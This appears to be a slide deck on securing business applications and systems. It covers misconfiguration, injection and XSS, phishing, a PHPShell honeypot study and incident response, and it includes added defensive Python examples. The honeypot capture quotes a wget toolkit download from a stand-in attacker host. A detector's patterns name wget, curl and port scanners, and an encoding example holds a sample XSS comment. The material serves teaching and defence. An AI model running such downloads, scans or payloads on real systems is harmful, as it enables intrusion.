Birlin, Bonds, Ramani and Reeds
The system/application domain consists of all of a business’s
mission-critical systems, applications, and data.
It is important to ensure that this domain is secure at all times;
otherwise a business could easily lose large amounts of sensitive
information as well as face the threat of having productivity
come to a halt. Common targeted systems and applications are
operating systems (desktop, server, and network), e-mail
applications and servers, Enterprise Resource Planning (ERP)
applications and systems, and web browsers.


Confidentiality: A requirement that private or
confidential information not be disclosed to
unauthorized individuals.
Issues related to this are:



Network security protocols
Network authentication services
Data encryption services




HIPAA fines
SOX violations
Users will lose confidence that their data is
secure.
Loss of customers.
Supply chain risk

Integrity: Data integrity is a requirement that
information and programs are changed only in
a specified and authorized manner. System
integrity is a requirement that a system
performs its intended function in an
unimpaired manner, free from deliberate or
inadvertent unauthorized manipulation of the
system. Issues related to this are:



Firewall services
Communications security management
Intrusion detection services





Data corruption
Uncertainty about good points to roll back to.
Loss of confidence among users and customers
Possible HIPAA or SOX fines.
Users may not see accurate data, much less
believe the data!


Availability: A requirement intended to ensure
that systems work promptly and service is not
denied to authorized users.
Typically, non-critical applications should stay
available 99.5% of the time, and critical ones
99.9%.

Critical apps typically are:
 Supply Chain
 HR
 Accounting

Issues related to availability are:



Fault tolerance for data availability (back-ups,
redundant disk systems)
Acceptable log-ins and operating process
performance
Reliable and interoperable security processes and
network security mechanisms




Workers are not able to complete their tasks in
a timely manner.
Loss of confidence from customers and users.
Calls and services abandoned by users.
Users and Customers will find a provider that
can meet their SLA Requirements!


Up to 20 years prison time.
Fines from $100k to $5M.









physical environment of the system
the personnel
management
administration procedures and security
measures within the organization
business operation and service delivery
hardware
software
communication equipment and facilities
and their combinations.




Surveillance Cameras not installed in server
rooms to deter unauthorized access.
Application and Database servers not placed in
a server room which is secured by key pad or
lock.
Hardware loggers
Application Servers sitting under people’s
desks!



Employees who improperly download
software to their machines run the risk of
installing malware with it.
Employee machines should not be issued with
rights that let employees install
unauthorized software.
Software installs on employee machines can be monitored
using a tool such as Eracent.

There is a tendency to grant too many rights to
users.

Default should not be an administrator, but a lesser
set of roles.

Systems administrators do not set up firewalls,
servers, databases and OS software properly to
prevent attacks.

The reason is that additional security protocols add
a higher level of rigor to day-to-day operations.

Sensitive folders use common names, such as
Admin, which tells an attacker exactly where to
look.



Sadly, many recommendation guidelines tell your
users to do exactly this!
Improper folder setup, allowing an attacker
to browse the contents of your site.
Improper setup of error handling, giving a
stack trace of your code to the outside user
when exceptions are thrown.


As the name suggests, this vulnerability allows
an attacker to run arbitrary, system-level code
on the vulnerable server and retrieve any
desired information contained therein.
Improper coding leads to this
vulnerability.
Products that have had this: phpBB, Invision Board,
cPanel, PayPal cart, Drupal, and many others



The default configuration of many sites is set up
in a way that gives users of the site full
privileges!
Sensitive Data is commonly exposed to the
outside world.
Software not kept up to date.


Some server admins are not vigilant in
ensuring the latest versions of application
software are installed on desktops.
Last year saw a number of attacks
through Java, Acrobat and Flash. These attacks
could have been prevented by proper patching.

There is a multitude of add-ons for web
applications; however, web administrators do
not properly lock down the user-facing
reports these add-ons produce.


Worldwide, 170K AWStats reports are publicly available.
ELMAH error-handling pages can be found by skilled
attackers and give full stack traces!



The application domain is a high-risk domain now.
Improper and lax security techniques plus high
reward targets mean the risks will continue
into the future.
Users with a low knowledge base also give
attackers ripe opportunities.



Nonprofit organization not attached to any
software company.
Releases a list of top 10 security threats on an
annual basis, for both desktop and mobile
platforms.
Core Purpose: Be the thriving global
community that drives visibility and evolution
in the safety and security of the world’s
software.


Code injection is the exploitation of a
computer bug that is caused by processing
invalid data. Code injection can be used by an
attacker to introduce (or "inject") code into a
computer program to change the course of
execution. The results of a code injection attack
can be disastrous. For instance, code injection is
used by some computer worms to propagate.
SQL, LDAP and OS Injection still rank as the #1
threat per OWASP.



Allows attackers to inject JavaScript code into
your hosted page, thus executing malware on
your own site.
Textboxes are where this code can be inserted.
Data saved into the database can then be used
against other users of the site. In other words,
I’m hosting my own malware!
84% of all security vulnerabilities, as
documented by Symantec.

https://www.youtube.com/watch?v=qO3iwAxkPxE

https://www.youtube.com/watch?v=FwIUkAwKzG8


Allows attackers to compromise session tokens or
keys to assume other users’ identities.
If the session ID is compromised, attackers can
impersonate other users on the system.




Phishing is a way of attempting to acquire information such as
usernames, passwords, and credit card details by masquerading as a
trustworthy entity in an electronic communication.
Spear phishing: Phishing attempts directed at specific individuals or
companies have been termed spear phishing.[35] Attackers may gather
personal information about their target to increase their probability of
success.
Clone phishing: A type of phishing attack whereby a legitimate, and
previously delivered, email containing an attachment or link has had its
content and recipient address(es) taken and used to create an almost
identical or cloned email. The attachment or link within the email is
replaced with a malicious version and then sent from an email address
spoofed to appear to come from the original sender. It may claim to be a
resend of the original or an updated version of the original. This
technique could be used to pivot (indirectly) from a previously infected
machine and gain a foothold on another machine, by exploiting the social
trust associated with the inferred connection due to both parties receiving
the original email.
Whaling: Several recent phishing attacks have been directed specifically at
senior executives and other high-profile targets within businesses, and the
term whaling has been coined for these kinds of attacks.



The motivation behind defacing websites is to
obtain peer recognition in the attacker’s
community.
Also used by politically motivated hacktivists
or cyber protesters.
Usually done via SQL injection or compromised
FTP.


Much more difficult to defend against.
Typically it has to do with a loss of reputation in
the community at large, which causes these
types of attacks.

PHPShell is a PHP script which allows shell commands to be executed
on a web server. Typically the PHPShell script is protected by a
password so only the server administrator can access it. We deployed
honeypots that advertise an unrestricted PHPShell application, which
attackers often tried to exploit.



Among other tools, attackers commonly downloaded and attempted
to use a variant of pscan. Pscan is an efficient port scanner that can
discover hosts which are listening on a particular port. Typically, the
attacker would run the tool, obtain a list of hosts with the port open
and then proceed to run an exploit tool against the list of hosts.
Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en US;
rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz
Port scans are commonly run; commonly open ports, like 80, 8080
and 8081, are typically what gets scanned.
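The honeypot capture above is the kind of record a defender can run detection over: the toolkit download followed by a scanner launch is a recognizable sequence. The following is an added Python example, not code from the slides or from the honeypot project; the log records are constructed in the same Date/User-Agent/Command layout, and the host name and signature list are illustrative assumptions.

```python
import re

# Constructed honeypot records laid out like the PHPShell capture quoted above
# (one Date/User-Agent/Command triple per request). The host name is a placeholder.
HONEYPOT_LOG = """\
Date: 2006-09-09 12:20:40
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/1.5.0.1
Command: wget http://evil.example.com/linux/fast.tgz
Date: 2006-09-09 12:21:02
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/1.5.0.1
Command: uname -a
Date: 2006-09-09 12:21:30
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) Firefox/1.5.0.1
Command: ./pscan 80
"""

# Behaviours the slide describes: fetching a toolkit, then scanning for open ports.
SIGNATURES = [
    ("remote-download", re.compile(r"^\s*(\./)?(wget|curl|fetch|lynx)\b")),
    ("port-scan", re.compile(r"\b(pscan|nmap|masscan)\b")),
]

def parse_records(text):
    # Group consecutive header lines into one dict per request; "Date" starts a record.
    records, current = [], {}
    for line in text.splitlines():
        key, _, value = line.partition(": ")
        if key == "Date" and current:
            records.append(current)
            current = {}
        current[key] = value
    if current:
        records.append(current)
    return records

def classify(command):
    # First matching signature wins; None means nothing to report.
    for tag, pattern in SIGNATURES:
        if pattern.search(command):
            return tag
    return None

def flag_records(text):
    # Return (date, tag, command) for every request whose command matches a signature.
    hits = []
    for rec in parse_records(text):
        tag = classify(rec.get("Command", ""))
        if tag:
            hits.append((rec["Date"], tag, rec["Command"]))
    return hits
```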



What is our defense strategy if we are
attacked?
How are we preparing to prevent an attack?
Who is engaged in the defense of our
company?


Application scanning tools: Code analysis can
be done using a tool such as HP Fortify.
Simulated attacks: Allows attacks to be
performed against the site using a tool such as HP
WebInspect.

First rule: NEVER TRUST YOUR USERS.

Validation Techniques from MS Stack
 Date Range
 Custom Validation
 Numeric Range Validation
 Regular Expression Validation
 Comparison Validation
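The five validation kinds listed above, applied to one constructed form submission. This is an added Python example, not the MS stack's validator controls; the form fields, the reserved-name rule and the bounds are assumptions made for the illustration.

```python
import re
from datetime import date

# Constructed form submission: every field arrives as an untrusted string.
FORM = {
    "birthdate": "1990-05-17", "quantity": "3", "email": "user@example.com",
    "password": "correct horse battery", "confirm": "correct horse battery",
    "username": "admin",
}
RESERVED_NAMES = {"admin", "administrator", "root"}  # hypothetical custom rule

def date_range(value, lo, hi):
    # Date Range: must parse as an ISO date and fall inside [lo, hi].
    try:
        return lo <= date.fromisoformat(value) <= hi
    except ValueError:
        return False

def numeric_range(value, lo, hi):
    # Numeric Range: ASCII digits only, then a bounds check (rejects "-1", "3e9").
    return re.fullmatch(r"[0-9]+", value) is not None and lo <= int(value) <= hi

def regex_match(value, pattern):
    # Regular Expression: fullmatch, so nothing can trail the accepted pattern.
    return re.fullmatch(pattern, value) is not None

def comparison(value, other):
    # Comparison: two fields must agree, e.g. password and its confirmation.
    return value == other

def custom(value, rule):
    # Custom Validation: any predicate the application needs.
    return rule(value)

def validate(form):
    # Return the fields that failed; an empty list means the submission is accepted.
    def get(key):
        return form.get(key, "")
    checks = {
        "birthdate": date_range(get("birthdate"), date(1900, 1, 1), date.today()),
        "quantity": numeric_range(get("quantity"), 1, 99),
        "email": regex_match(get("email"), r"[^@\s]+@[^@\s]+\.[A-Za-z]{2,}"),
        "confirm": comparison(get("password"), get("confirm")),
        "username": custom(get("username"), lambda v: v.lower() not in RESERVED_NAMES),
    }
    return [field for field, ok in checks.items() if not ok]
```

Note that a missing field is treated as an empty string and therefore fails its check, which is the server-side half of never trusting the client.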




String encoding of data before it goes to the
server, otherwise known as sanitizing your
inputs.
AntiXSS for the MS stack and AntiSamy for the
Java domain
Data from the web: I'm here to stay!
Encoded: I%27m%20here%20to%20stay!
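The encoding step this slide and the stored-XSS slide describe, shown in Python as an added example rather than with the AntiXSS or AntiSamy libraries: the slide's own sample string is percent-encoded, and a constructed comment that a visitor might submit through a textbox is rendered once without and once with HTML entity encoding. The `render_*` helpers and the sample comment are assumptions made for the illustration.

```python
import html
from urllib.parse import quote

# Constructed inputs: the slide's sample string, and a comment as an attacker might
# submit it through a textbox so that it is stored and later served to other users.
PAGE_SAMPLE = "I'm here to stay!"
STORED_COMMENT = 'Nice post <script>alert(1)</script> <a href="x" onclick="x()">x</a>'

def url_encode(value, keep="!"):
    # Percent-encode for use inside a URL. Python's quote() would also encode "!",
    # so it is kept unencoded here only to reproduce the slide's example output.
    return quote(value, safe=keep)

def html_encode(value):
    # Entity-encode for an HTML body or attribute context: < > & " ' become inert text.
    return html.escape(value, quote=True)

def render_unsafe(comment):
    # What a vulnerable page does: stored data pasted straight into the markup.
    return f'<div class="comment">{comment}</div>'

def render_safe(comment):
    # Same page with encoding on output; the browser displays the text and runs nothing.
    return f'<div class="comment">{html_encode(comment)}</div>'

def has_raw_tag(fragment):
    # A "<" followed by a letter in the comment area means markup survived encoding.
    inner = fragment[len('<div class="comment">'):-len("</div>")]
    return any(c == "<" and inner[i + 1:i + 2].isalpha() for i, c in enumerate(inner))
```

Encoding must match the context the data lands in (URL, HTML body, attribute); the same string needs a different encoder for each, which is the reason to use a library such as the ones named above rather than ad hoc replacements.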




PII should always be encrypted in the
database.
Credit card information should always be
encrypted.
SSL should be used for all sensitive
communications between your server and user.
Proper VPN tunnels should be set up for
remote users.



A security department should be implemented
which monitors all incoming and outgoing
traffic.
Monitors all traffic to the enterprise.
Should be a vigilant, ongoing process instead of
reacting to attacks one at a time (no more whack-a-mole).



Users that are logged into the website should
have some sort of audit trail on their actions, so
as to determine the history of these users.
A database log of inserts, adds and deletes allows
us to track malicious activity by insiders.
An ELMAH audit trail allows us to provide error
logging hidden from the user.





Be ready to force enterprise wide password
changes should an attacker obtain elevated
privileges.
Isolate the environment from the Internet.
Block egress traffic to known malicious C2 IP
addresses and domains.
Block dynamic DNS providers.
Rebuild or replace compromised systems.



Do employees know what to do if their
machines are compromised?
Do employees know how to tell good emails
from bad ones?
Do employees know what to do with
suspicious emails?







Define computers, e-mail, Internet, and so on as broadly as possible, with
specifics given, but not limited to such specifics
Remind employees that not only job loss, but also civil liability and
criminal prosecution may result from certain actions (illegal
pornography, participation in spamming operations or other scams,
involvement in computer hacking (see 18 U.S.C. § 1030, among other
laws))
Company needs to reserve the right to monitor all computer usage at all
times for compliance with the policy
Right to inspect an employee's computer, HD, floppy disks, and other
media at any time
Right to withdraw access to computers, Internet, e-mail if needed
Consider prohibiting camera phones (also called cell phone cameras);
such phones have been implicated in gross invasions of other employees'
privacy and in theft of company secrets
Make sure employees know they have no reasonable expectation of
privacy in their use of the company's electronic resources, since it is all
company property and to be used only for job-related purposes


So our company’s assets have been
compromised. What’s next?
The best line of defense is having a response
strategy in place, from compromised assets to
whole system loss.





1. Identify the last known time our system’s
data was stable.
2. Pull the data backups from that time,
whether on disk or on tape.
3. Restore the data to the last known good data
point.
4. Notify customers and users throughout the
process of the data loss.
5. Self-report to authorities any possible HIPAA or
SOX violations.



Notify customer immediately of breach, and
possible data leakage, and advise them to
change their passwords.
Identify the source of the breach, through
system logs, network logs and data logs.
Notify authorities and press of the breach to
stay in front of the situation.



Identify the source of the system outage.
Acquire proper backups of systems to stand up
in a different physical location. Restore our
systems to new servers if need be.
Blackhole DNS attacks to a spoofed IP address.